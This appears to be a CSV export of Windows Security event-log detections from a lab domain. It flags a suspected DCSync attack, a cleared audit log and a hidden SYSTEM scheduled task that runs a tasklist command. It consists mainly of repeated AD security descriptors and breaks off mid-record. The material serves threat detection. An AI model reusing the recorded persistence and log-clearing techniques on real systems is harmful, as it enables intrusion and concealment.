O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 566836 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x17e2d2 \CYAlyNSS <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="LocalSystem"> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> </Task> ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 198238040 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x8d7099 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242592 Security DC1.insecurebank.local 57DCCD4C-7381-4371-8480-D74D47019AD8 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242591 Security DC1.insecurebank.local A1AA38AA-447E-46C2-ABA0-D205D4D8F873 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242590 Security DC1.insecurebank.local A1AA38AA-447E-46C2-ABA0-D205D4D8F873 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242589 Security DC1.insecurebank.local 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-